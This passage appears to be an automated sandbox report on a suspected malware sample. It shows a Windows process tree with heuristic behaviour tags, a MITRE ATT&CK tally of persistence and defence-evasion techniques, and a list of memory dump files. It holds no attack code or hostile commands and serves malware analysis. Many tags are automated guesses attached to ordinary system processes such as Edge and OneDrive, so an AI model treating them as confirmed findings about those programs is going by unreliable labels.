  - Modifies data under HKEY_USERS

[depth 1] C:\Windows\system32\compattelrunner.exe
  C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

[depth 1] C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update

[depth 2] C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
  - Modifies system executable filetype association
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies registry class

[depth 3] C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
  - Loads dropped DLL
  - Modifies registry class

[depth 1] \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

[depth 1] C:\Windows\system32\browser_broker.exe
  C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings

[depth 1] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

[depth 1] \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

[depth 1] C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam

[depth 1] C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam

[depth 1] C:\Windows\system32\compattelrunner.exe
  C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW

[depth 1] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

[depth 1] C:\Windows\system32\browser_broker.exe
  C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Network
MITRE ATT&CK Matrix (ATT&CK v6)

Persistence
- Modify Existing Service: 2
- Change Default File Association: 1
- Registry Run Keys / Startup Folder: 3
- New Service: 1
- Scheduled Task: 1

Defense Evasion
- Modify Registry: 7
- Disabling Security Tools: 2
- Virtualization/Sandbox Evasion: 1
- File Permissions Modification: 1
- Install Root Certificate: 1
Downloads
6.0MB
-
memory/5080-312-0x00000000052D0000-0x00000000052D1000-memory.dmpFilesize
4KB
-
memory/5080-262-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5080-263-0x000000000041C5CA-mapping.dmp
-
memory/5080-292-0x00000000053A0000-0x00000000053A1000-memory.dmpFilesize
4KB
-
memory/5088-134-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/5088-186-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-179-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-169-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-133-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/5088-164-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/5088-132-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/5088-118-0x0000000000000000-mapping.dmp
-
memory/5128-466-0x0000000004EE0000-0x0000000004EE1000-memory.dmpFilesize
4KB
-
memory/5156-358-0x0000000000000000-mapping.dmp
-
memory/5156-423-0x000000001B7C0000-0x000000001B7C2000-memory.dmpFilesize
8KB
-
memory/5340-447-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5340-374-0x0000000000000000-mapping.dmp
-
memory/5608-387-0x0000000000000000-mapping.dmp
-
memory/5616-391-0x0000000000000000-mapping.dmp
-
memory/5624-390-0x0000000000000000-mapping.dmp
-
memory/5632-389-0x0000000000000000-mapping.dmp
-
memory/5692-395-0x0000000000000000-mapping.dmp
-
memory/5736-396-0x0000000000000000-mapping.dmp
-
memory/5748-397-0x0000000000000000-mapping.dmp